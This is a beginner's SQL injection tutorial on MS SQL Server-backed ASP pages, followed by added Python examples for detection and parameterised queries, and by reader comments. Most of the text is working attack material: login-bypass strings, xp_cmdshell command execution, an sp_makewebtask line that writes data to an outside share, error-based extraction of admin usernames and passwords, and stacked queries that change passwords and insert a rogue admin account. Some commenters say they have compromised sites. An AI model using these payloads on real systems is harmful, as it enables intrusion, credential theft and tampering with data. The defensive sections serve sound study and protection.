The following article will try to help beginners grasp the problems they face when trying to use SQL Injection techniques, to use them successfully, and to protect themselves from such attacks.
Credit:
The information has been provided by SK.
1.0 Introduction
When a machine has only port 80 open, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patches his server, you have to turn to web hacking. SQL injection is one type of web hacking that requires nothing but port 80, and it might just work even if the admin is patch-happy. It attacks the web application (ASP, JSP, PHP, CGI, etc.) itself rather than the web server or the services running on the OS.
This article does not introduce anything new; SQL injection has been widely written about and used in the wild. We wrote the article because we would like to document some of our pen-tests using SQL injection and hope that it may be of some use to others. You may find a trick or two, but please check out "9.0 Where can I get more info?" for the people who truly deserve credit for developing many of the techniques in SQL injection.
1.1 What is SQL Injection?
It is a trick to inject a SQL query/command as input, possibly via web pages. Many web pages take parameters from the web user and make a SQL query to the database. Take for instance a user login: the web page takes the user name and password and makes a SQL query to the database to check whether the user has a valid name and password. With SQL Injection, it is possible for us to send a crafted user name and/or password field that changes the SQL query and thus grants us something else.
1.2 What do you need?
Any web browser.
2.0 What should you look for?
Try to look for pages that allow you to submit data, i.e. login pages, search pages, feedback forms, etc. Sometimes, HTML pages use the POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML and look for the "FORM" tag. You may find something like this in some HTML code:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> tags is a potential parameter that might be useful (exploit-wise).
2.1 What if you can't find any page that takes input?
You should look for ASP, JSP, CGI, or PHP web pages. Try especially to look for URLs that take parameters, like:
http://duck/index.asp?id=10
3.0 How do you test if it is vulnerable?
Start with the single quote trick. Input something like:
hi' or 1=1--
into the login field, the password field, or even the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it to your hard disk, and modify the URL and hidden field accordingly. Example:
<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get logged in without any login name or password.
3.1 But why ' or 1=1--?
Let us look at another example of why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an ASP page that links you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name and 'food' is the value assigned to the variable. In order to do that, the ASP page might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")   ' the URL parameter is taken as-is, with no validation
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"   ' and concatenated straight into the SQL text
set rs=conn.execute(sqlstr)
As we can see, our value will be wrapped into v_cat and thus the SQL statement becomes:
SELECT * FROM product WHERE PCategory='food'
The query should return a result set containing one or more rows that match the WHERE condition, in this case 'food'.
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now our variable v_cat equals "food' or 1=1-- ", and if we substitute this into the SQL query we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query will now select everything from the product table regardless of whether PCategory is equal to 'food' or not. The double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote ('). Sometimes it may be possible to replace the double dash with a single hash "#".
However, if it is not SQL Server, or you simply cannot ignore the rest of the query, you may also try:
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
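To see exactly what the substitution above does to the WHERE clause, here is an added Python example (not code from the article) that rebuilds the ASP page's string concatenation against an in-memory SQLite table standing in for the MS SQL product table, and runs the same lookup with a bound parameter for comparison. The table rows are constructed; SQLite treats `--` as a line comment just as MS SQL Server does, so the injected strings behave as described in the text.

```python
import sqlite3

# Constructed sample rows standing in for the article's "product" table.
SAMPLE_ROWS = [("food", "apple"), ("food", "bread"), ("tools", "hammer"), ("books", "novel")]


def make_db():
    """In-memory SQLite stand-in for the MS SQL table used by the ASP page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (PCategory TEXT, PName TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, v_cat):
    """Mirrors the ASP code: the raw request parameter is concatenated into the statement,
    so a quote inside v_cat closes the literal and whatever follows is parsed as SQL."""
    sqlstr = "SELECT * FROM product WHERE PCategory='" + v_cat + "'"
    return sqlstr, conn.execute(sqlstr).fetchall()


def safe_lookup(conn, v_cat):
    """Same query with a bound parameter: the value travels separately from the SQL text,
    so quotes and comment markers inside it are just characters in the data."""
    return conn.execute("SELECT * FROM product WHERE PCategory=?", (v_cat,)).fetchall()


def compare(v_cat):
    """Run both forms for one category value and report the built statement and row counts."""
    conn = make_db()
    sqlstr, vuln_rows = vulnerable_lookup(conn, v_cat)
    safe_rows = safe_lookup(conn, v_cat)
    return {"sql": sqlstr, "vulnerable": len(vuln_rows), "safe": len(safe_rows)}


if __name__ == "__main__":
    for cat in ("food", "food' or 1=1--", "food' or 'a'='a"):
        print(compare(cat))
```

With the plain value both forms return the two food rows; with either injected string the concatenated query returns all four rows while the bound query returns none, because no category is literally named "food' or 1=1--".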
4.0 How do I get remote execution with SQL injection?
Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using a double quote (") if the single quote (') is not working.
The semicolon ends the current SQL query and thus allows you to start a new SQL command. To verify that the command executed successfully, you can listen on 10.10.1.2 for ICMP packets and check whether any arrive from the server:
#tcpdump icmp
If you do not get any ping request from the server and get an error message indicating a permission error, it is possible that the administrator has limited the web user's access to these stored procedures.
5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write the output of your query into an HTML file:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the host at the IP in the path must have the folder "share" shared for Everyone.
6.0 How to get data from the database using ODBC error messages
We can use information from the error messages produced by MS SQL Server to get almost any data we want. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information about all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
This should return the first table name in the database. When we UNION this string value with the integer 10, MS SQL Server will try to convert the string (nvarchar) to an integer. This produces an error, since such an nvarchar cannot be converted to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that could not be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We can also search for data using the LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching pattern '%25login%25' will be seen as %login% by SQL Server. In this case, we get the first table name that matches the criteria, "admin_login".
6.1 How to mine all column names of a table?
We can use another useful table, INFORMATION_SCHEMA.COLUMNS, to map out all the column names of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtain the rest of the column names, i.e. "password" and "details". We know we have them all when we get the following error message:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id','login_name','password','details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
6.2 How to retrieve any data we want?
Now that we have identified some important tables and their columns, we can use the same technique to gather any information we want from the database.
Now let's get the first login_name from the "admin_login" table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name "neo". Finally, to get the password of "neo" from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now log in as "neo" with his password "m4trix".
6.3 How to get numeric string value?
There is a limitation with the technique described above. We cannot get any error message if we are trying to convert text that consists of a valid number (characters 0-9 only). Let's say we are trying to get the password of "trinity", which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason is that the password "31173" will be converted into a number before the UNION with the integer (10 in this case). Since it is a valid UNION statement, SQL Server will not throw an ODBC error message, and thus we will not be able to retrieve any numeric entry.
To solve this problem, we can append some letters to the numeric string to make sure the conversion fails. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append any text we want to the password (the ASCII code for '+' is 0x2b, hence %2b in the URL). We append ' morpheus' (with a leading space, %20) to the actual password. Therefore, even if we have a numeric string '31173', it becomes '31173 morpheus'. By manually calling the convert() function to convert '31173 morpheus' into an integer, SQL Server will throw the ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now you can even log in as 'trinity' with the password '31173'.
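Every request in sections 6.0 to 6.3 travels in a GET query string, which a web server normally writes to its access log; the following added Python example (mine, not part of the article) shows how a defender can scan such a log for these requests. The log lines are constructed in the W3C extended format that IIS uses (date, time, client IP, method, URI stem, URI query, status), the signature list is my own, and the one round of URL decoding is what turns the article's %25login%25 back into %login%.

```python
import re
from urllib.parse import unquote

# Constructed W3C-style web server log lines (not from any real server). Fields:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Software: constructed sample
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-02-10 10:01:02 10.0.0.7 GET /index.asp id=10 200
2006-02-10 10:01:09 10.0.0.7 GET /index.asp id=10%20UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES-- 500
2006-02-10 10:01:15 10.0.0.7 GET /index.asp id=10%20UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20LIKE%20'%25login%25'-- 500
2006-02-10 10:02:30 10.0.0.9 GET /index.asp category=food 200
2006-02-10 10:02:41 10.0.0.9 GET /index.asp category=food'%20or%201=1-- 200
2006-02-10 10:02:58 10.0.0.7 GET /index.asp id=10;%20exec%20master..xp_cmdshell%20'ping%2010.10.1.2'-- 500
2006-02-10 10:03:00 10.0.0.9 GET /search.asp q=o'neill 200
"""

# Signatures for the techniques in sections 3 to 7, matched against the decoded query string.
PATTERNS = [
    ("union-select", re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\.", re.I)),
    ("stacked-exec", re.compile(r";\s*(exec|update|insert)\b", re.I)),
    ("quote-or-comment", re.compile(r"'\s*(or|and)\b.*--", re.I)),
    ("extended-proc", re.compile(r"\b(xp_cmdshell|sp_makewebtask|xp_sendmail|xp_startmail)\b", re.I)),
]


def parse_line(line):
    """Split one log line into fields; returns None for directive (#) and blank lines."""
    if not line.strip() or line.startswith("#"):
        return None
    date, time, ip, method, stem, query, status = line.split()
    # One round of URL decoding: %25login%25 becomes %login%, %2b becomes +, as the article notes.
    return {"ip": ip, "stem": stem, "query": unquote(query), "status": int(status)}


def classify(entry):
    """Names of every signature the decoded query matches, in PATTERNS order."""
    return [name for name, rx in PATTERNS if rx.search(entry["query"])]


def scan_log(text):
    """Return the suspicious requests with their matched signatures; a 5xx status next to a hit
    is the footprint of the error-based extraction described in section 6."""
    flagged = []
    for raw in text.splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            entry["hits"] = hits
            entry["server_error"] = entry["status"] >= 500
            flagged.append(entry)
    return flagged


if __name__ == "__main__":
    for e in scan_log(SAMPLE_LOG):
        print(e["ip"], e["status"], e["hits"], e["query"])
```

Two caveats on the design: the benign apostrophe in q=o'neill is not flagged, because a lone quote is normal data and the signatures key on the quote-plus-operator-plus-comment shape instead; and POST bodies (the hidden-field forms of section 2.0) never reach the access log, so form submissions need logging in the application itself. Signatures like these are a triage aid for the operations side, not a substitute for the fixes in section 8.0.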
7.0 How to update/insert data into the database?
Once we have successfully gathered all the column names of a table, it is possible for us to UPDATE or even INSERT a new record into the table. For example, to change the password for "neo":
http://duck/index.asp?id=10; UPDATE admin_login SET password = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO admin_login (login_id, login_name, password, details) VALUES (666,'neo2','newpas5','NA')--
We can now log in as "neo2" with the password "newpas5".
8.0 How to avoid SQL Injection?
Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:
- Input from users
- Parameters from the URL
- Values from cookies
For numeric values, convert them to an integer before passing them into the SQL statement, or use ISNUMERIC to make sure the value is a number.
Change "Startup and run SQL Server" to a low-privilege user in the SQL Server Security tab.
Delete stored procedures that you are not using, like:
master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
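The first two rules above, applied to the article's own pages, as an added Python example (mine, not the article's): the id parameter from section 6 is converted to an integer before it is used, the login fields from section 1.1 are refused if they contain any of the listed characters, and both queries then bind their values instead of concatenating them. SQLite stands in for MS SQL Server, the tables and the single "neo" row are constructed from the column names in section 6, and the character list and length limit are my choices.

```python
import re
import sqlite3


def make_db():
    """Constructed tables with the column names from section 6; SQLite stands in for MS SQL Server."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER, PName TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)", [(10, "apple"), (11, "bread")])
    conn.execute("CREATE TABLE admin_login (login_id INTEGER, login_name TEXT, password TEXT, details TEXT)")
    conn.execute("INSERT INTO admin_login VALUES (1, 'neo', 'm4trix', 'NA')")
    return conn


# Section 8.0, first rule: characters to refuse in any string taken from user input, the URL or a cookie.
FORBIDDEN = frozenset("'\"/\\;\x00\r\n")


def validate_string(value, max_len=64):
    """Reject strings that carry a forbidden character or are over length; return the value otherwise."""
    if len(value) > max_len or any(ch in FORBIDDEN for ch in value):
        raise ValueError("rejected string input")
    return value


def validate_int(value):
    """Section 8.0, second rule: a numeric parameter must be a plain integer before it goes near SQL."""
    if not re.fullmatch(r"-?\d{1,9}", value.strip()):
        raise ValueError("rejected non-integer input")
    return int(value)


def product_by_id(conn, raw_id):
    """The id=10 lookup from section 6, with the value converted first and then bound."""
    return conn.execute("SELECT PName FROM product WHERE id=?", (validate_int(raw_id),)).fetchall()


def login(conn, raw_user, raw_pass):
    """The login check from section 1.1: filtered strings, then bound parameters rather than concatenation."""
    user, pwd = validate_string(raw_user), validate_string(raw_pass)
    row = conn.execute(
        "SELECT login_id FROM admin_login WHERE login_name=? AND password=?", (user, pwd)
    ).fetchone()
    return row is not None


def handle(conn, action, *args):
    """Dispatch like a request handler: bad input gets a generic 'rejected' instead of an ODBC error page."""
    try:
        result = product_by_id(conn, *args) if action == "product" else login(conn, *args)
    except ValueError:
        return "rejected"
    return result


if __name__ == "__main__":
    db = make_db()
    print(handle(db, "product", "10"))
    print(handle(db, "product", "10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--"))
    print(handle(db, "login", "neo", "m4trix"))
    print(handle(db, "login", "hi' or 1=1--", "hi' or 1=1--"))
    print(handle(db, "login", "neo", "x or 1=1--"))
```

The last call is the instructive one: the quote-free variant from section 3.1 (or 1=1--) passes the character filter untouched, and it is the bound parameter, not the filter, that keeps it from altering the query. The filter alone also turns away legitimate values that contain an apostrophe, so binding is the control to rely on and filtering is a second layer.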
9.0 Where can I get more info?
One of the earliest works on SQL Injection we have encountered is the paper from Rain Forest Puppy about how he hacked PacketStorm:
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
A great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
A good summary of SQL Injection on various SQL servers:
http://www.owasp.org/asac/input_validation/sql.shtml
SensePost's article on SQL injection:
http://www.sensepost.com/misc/SQLinsertion.htm
Other worthwhile reading:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
Subject: Good
Date: 24 Oct. 2005
From: pawankumar2k1 at yahoo dot com
This was a good topic, but this topic lacks: if developers have applied the security measures for SQL Injection, then how do we inject SQL queries into web applications?

Subject: Useful Information
Date: 27 Oct. 2005
From: anon.
This guide is very useful information.

Subject: smart
Date: 9 Nov. 2005
From: ntnijeeshyahoo.com
This was a smart topic. But as a developer I want to learn more about how to tighten the security of my applications against the injection.

Subject: uhh... you dont
Date: 11 Nov. 2005
From: anon.
If developers have applied the security measures to prevent SQL injection, then you can't inject SQL queries. It's something completely preventable by good coding practice and usually only is allowed when the developer is being lazy or sloppy.

Subject: for php and mysql
Date: 15 Nov. 2005
From: just me
There is a nice article, that comes with a working solution for php+mysql injection.
http://www.askbee.net/articles/php/SQL_Injection/sql_injection.html

Subject: Another discussion
Date: 21 Nov. 2005
From: Andrew
I discuss this subject with a basic introduction to SQL at the following address: http://andrew.absurdlycool.com/class/l7.html

Subject: Useful Information
Date: 5 Dec. 2005
From: Janner Simarmata
This was a good topic, but this topic lacks: if developers have applied the security measures for SQL Injection, then how do we inject SQL queries into web applications?

Subject: twisted metal
Date: 5 Dec. 2005
From: Animemouse
Although the developers have applied the security measures, we still can swift the code to the other angle.. just be creative... but it will take time though.

Subject: very good one
Date: 7 Dec. 2005
From: eby
This is an excellent article. thanks a lot

Subject: Good article but...
Date: 16 Dec. 2005
From: shareefer
Great article, except for one thing. As a matter of prevention, you should ALWAYS use stored procedures in your web code.
Stored procedures interpret their parameters literally even if they contain SQL code, so all SQL injections are blocked... simple as that. No need for checking for dashes, quotes, SQL keywords, etc.

Subject: What The Doors Locked
Date: 26 Dec. 2005
From: Dark Pontifex
Great Article For SQL Injection

Subject: good for beginners
Date: 27 Dec. 2005
From: la
A good beginning to understand. Thanks.

Subject: good information
Date: 29 Dec. 2005
From: sponsbobspyahoo.com
good tutorial,
thank you

Subject: Thank you for the information
Date: 4 Jan. 2006
From: Padrino123
This article really helped me. Thanks for the information.

Subject: Really Nice article
Date: 9 Jan. 2006
From: Uppalapati Giri Prasad
This article is really clear enough to understand the concept and rich in information to implement an example. Thanks for publishing such a good article.

Subject: quite well
Date: 18 Jan. 2006
From: rajgremo_u_rajyahoo.com
This is well architected data............... thank you for giving data

Subject: Stored Procs are not guaranteed protection
Date: 18 Jan. 2006
From: dbjstein
In response to the note above, it is not I believe the case that stored procedures prevent SQL injection in all cases. Stored procedures are frequently set up to contain dynamic SQL, where the statement is constructed at runtime. In those cases, there is no precompiled statement, and therefore no prevention of SQL injection techniques. Only if the stored procedure contains a defined SQL statement with bind variables or parameters to be parsed into the statement, will it prevent SQL injection.

Subject: Is it possible!!
Date: 19 Jan. 2006
From: Deepak
SQL Injection is not possible in stored procedures... so it is the easiest way to prevent sql injection... Is any type of hacking possible, when using stored procedures?!!

Subject: Very good article
Date: 19 Jan. 2006
From: Deepak
It's a very nice article and expecting more like this...

Subject: very good topic to read
Date: 19 Jan. 2006
From: prashant
It is useful to teach about what is SQL Injection.

Subject: say so..
Date: 21 Jan. 2006
From: Burner
This article is so useful, especially for those who are new to application developing, database designing, database admins, webserver admins, etc., and of course it is a reminder for all of us. But there is a problem about the bad users, that they can use this information to launch attacks against certain places,
so this type of article is one way good, one way bad....
Should we put this kind of information on public sites????
thanks

Subject: Good Article
Date: 24 Jan. 2006
From: Bob
This is one of the best articles I have ever seen about SQL Injection.........
But, in one way I do agree with burner about whether to keep these sort of articles on public sites..

Subject: Why hide them from public eyes
Date: 29 Jan. 2006
From: Dogman
These things shouldn't be hidden from public eyes. There are a lot of developers that never heard about this concept and are writing injectable web applications. Also.. there are a lot of people that are using those applications.. This is very good material and every developer should read it. Also every developer should read about securing their applications. Too bad they don't. I've met people with much more experience than me sustaining that stored procs are slower than calling the query straight from your application and so on..
I hope you all got my point.

Subject: good
Date: 2 Feb. 2006
From: alir9
Today, we have some web applications that don't patch 'or' in the login page!!! This article was good but there are some differences between ms-sql and mysql and no one explained them!

Subject: great job dude
Date: 4 Feb. 2006
From: Kevo
I really enjoyed reading this a lot thanks man!!1

Subject: none
Date: 9 Feb. 2006
From: anon
With login pages don't most people store encrypted passwords using some sort of server side function to decrypt or compare? How would injection get past that for logging in? Just curious because I tried the stuff in this article and wasn't able to login to a site I run, but I would like to fix the hole if this is still possible another way.

Subject: Variance in SQL server error messages
Date: 10 Feb. 2006
From: redeye
I tried testing this on a site, using something similar to:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Instead of the useful
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
I get this:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting character string to smalldatetime data type.
/titlenews.inc, line 46
Is this a newer version of SQL server or a differently configured one, one which deliberately does not output the useful data?

Subject: bind variables
Date: 10 Feb. 2006
From: seph
How is using stored procedures going to prevent this?
... you just need to make sure you use bind variables.

Subject: great but much brief
Date: 14 Feb. 2006
From: neido
yeah it contains cool stuff but u have to make it more user friendly than this.

Subject: COMMON
Date: 15 Feb. 2006
From: hay
this trick is common i should find the better ones

Subject: SQL injection sux
Date: 21 Feb. 2006
From: White HaCker
I prefer LKM rootkit attacks for sun servers.
This could be used as a kernel hacking trick.
Just like the way i used to code buffer overflows for unix servers ...

Subject: Php injection
Date: 22 Feb. 2006
From: whisker
Has any php site fallen for SQL Injection? I read an article that only .asp and .cfm will fall easily
for SQL Injection.. let me know some comments on this.. if anyone did SQL Injection on a PHP site please let me know; i have fallen many asp sites with SQL injection.

Subject: devakishore at yahoo.com
Date: 22 Feb. 2006
From: etterdev
we can know whether the site is vulnerable to sql injection or not by the way they handle the errors.. but how to know which backend database the site is running? is there any tool
for knowing that.

Subject: nice article to get to know SQL injection
Date: 3 Mar. 2006
From: Ashvinbodhale
The attack can be foiled by already developed apps and also stored procs that are embedded inside code--- all works well.
chk this URL... http://www.askbee.net/articles/php/SQL_Injection/sql_injection.html

Subject: Nice tutorial
Date: 7 Mar. 2006
From: cream_shady4uyahoo.com
The tutorial fairly teaches hacking through sql injection and preventive measures, but what if web applications are running another application different from sql server?

Subject: Nice tutorial
Date: 10 Mar. 2006
From: cream_shady4uyahoo.com
The tutorial fairly teaches hacking through sql injection and preventive measures, but what if web applications are running another application different from sql server?

Subject: works on any database
Date: 10 Mar. 2006
From: Spotty-faced Git
This is an attack that works on any database backend, not just SQL Server. You just have to replace the INFORMATION_SCHEMA table names with the appropriate system table names for the product you are working against. A SQL Injection attack is a result of manipulating the standard SQL query language (used by nearly all DB products), and bad coding practices by the web developer. It's completely DB agnostic at its basic level.

Subject: how du u use this
Date: 12 Mar. 2006
From: oLi
i tried to use this on a forum and it did nothing????

Subject: what about this solution
Date: 15 Mar. 2006
From: da_man
I tested a forum made by a friend and his login looked kinda like this (shortened down a bit):
$query_1 = mysql_query("SELECT * FROM ".$tpref."users WHERE UserName = '$_POST[usern]' AND PassWord = '$_POST[passwd]'");
//check login
if (mysql_num_rows($query_1) == 1){
// do login stuff
} else {
// print error msg
}
how safe is that against sql injection?

Subject: Not very safe...
Date: 21 Mar. 2006
From: Nick Goloborodko
At the very least what you need to do is to check the input, and escape/remove all of the SQL special characters. Also, consider using SPs.
Kind regards,
Nick Goloborodko

Subject: Very Rich in Knowledge - Really Interesting
Date: 21 Mar. 2006
From: Jabir Hussain
This is really rich in knowledge. It helped me a lot to secure my applications

Subject: interesting
Date: 29 Mar. 2006
From: pro
definitely makes you hungry for more information. I wonder where you could get a class in these techniques?

Subject: this is my query... what can u send in the user name or password to inject this
Date: 30 Mar. 2006
From: Elad
strsql = "SELECT username, password " +
"FROM Agents " +
"WHERE (username = N'" + _UserName.ToString() + "') AND (password = N'" + _Password + "')";

Subject: table names corresponding to different db
Date: 8 Apr. 2006
From: sumit
can u tell me what are the different system table names in the context of different sql servers.
eg. what do i replace INFORMATION_SCHEMA.TABLES with in mysql server?
Thanks

Subject: what is the work of rank in sql injection
Date: 14 Apr. 2006
From: anobscase
i just want to know the work of rank in sql injection

Subject: Cool Stuff
Date: 5 May 2006
From: Anand
Good Help.. for beginners.... as a developer or security guy.

Subject: :-
Date: 8 May 2006
From: __ThE_BiG_DoG__
i get all that stuff and i found out u can use perl to access the codes of sql into sites but... i cant work out how 2 se that :-s any advice

Subject: :) waw
Date: 12 May 2006
From: _Mt_DB_
i think this is good information for security

Subject: With access DB
Date: 17 May 2006
From: tieulongnuxinh
I can't do it with access db:
Microsoft JET Database Engine error '80004005'
Could not find file 'c:\windows\system32\inetsrv\INFORMATION_SCHEMA.mdb'.
/aboutus_content.asp, line 18

Subject: (,)
Date: 17 May 2006
From: wala lang
thank you

Subject: What about...
Date: 18 May 2006
From: ho
sql interjections? Are they as bad or can we just kinda ignore them?

Subject: GoOD Article..
Date: 22 May 2006
From: Kumarkumskumar_005yahoo.com
Hai,
This is one of the good articles which i found. I hope all developers read this article.
May i expect some more SQL Injection with examples..

Subject: Wonderful article
Date: 5 Jun. 2006
From: Dev
Fine Article for the beginners...

Subject: Good one
Date: 6 Jun. 2006
From: Kalyani
Good article!!

Subject: Good Article
Date: 8 Jun. 2006
From: Ramzan
Best Article, but i think this should be hidden from Mischievous People.

Subject: Excellent!
Date: 8 Jun. 2006
From: israelagnouhyattarahotmail.com
It's a shame not too many PHP+SQL admins limit how the client manipulates DBase data through injections. They worry too much about patching applications (which is not bad), but they should also consider focusing on these attacks, as they have proven to be extremely handy when everything is patched up.

Subject: Cool Stuff
Date: 13 Jun. 2006
From: habib.khalidhotmail.com
It's a nice article for every web developer; they should take care of SQL injection in order to improve security.

Subject: what about port 443
Date: 20 Jun. 2006
From: Jeffro
Would this work the same if you were utilizing port 443 vs port 80???

Subject: Really Interesting!!!!!!
Date: 21 Jun. 2006
From: skjha2000rediffmail.com
Really interesting and helpful topic for web based application testing.
Regards,
Subodh Kumar Jha
Associate Test Engineer,
Aftek Infosys Ltd. +919823282061

Subject: Cool Stuff
Date: 29 Jun. 2006
From: Jasthi Adi Vishnu Murthy
Interesting and helpful topic on Replication

Subject: Really Interesting
Date: 6 Jul. 2006
From: Somesh
Interesting and helpful topic for web based application testing.

Subject: hello...
Date: 7 Jul. 2006
From: Renu
Hello there..
This article is really very helpful. Despite studying this concept for the very first time I got clear with it to a very great extent.... But being a s/w tester I must know this concept
in detail. Whatever projects I am currently working on, I am using VB.NET, ASP.NET & sql server tech. So could any one of u tell me how it affects this combination?? What are the things I have to test for in case of SQL security??

Subject: Best Write Up to Date
Date: 7 Jul. 2006
From: UtmostBastard
Kudos to the author/s. This is by far the most in depth write up I have read. Thanks for taking the time to put this out!!

Subject: HEllo there.......
Date: 8 Jul. 2006
From: Renu
HEllo there,
i have gone through this article & it's really helpful. But i do have one question,
if im using .net & SQL server tech. that time what kind of things i have to test for
from security point of view?? if possible please ans me back..... im working with web applications using ASP.net

| Subject:
|
good article |
Date: |
13 Jul. 2006 |
| From: |
amoogye |
| it was good article to read. thank you |
|
| Subject:
|
I highly suggest you watch this video... |
Date: |
14 Jul. 2006 |
| From: |
Ralph |
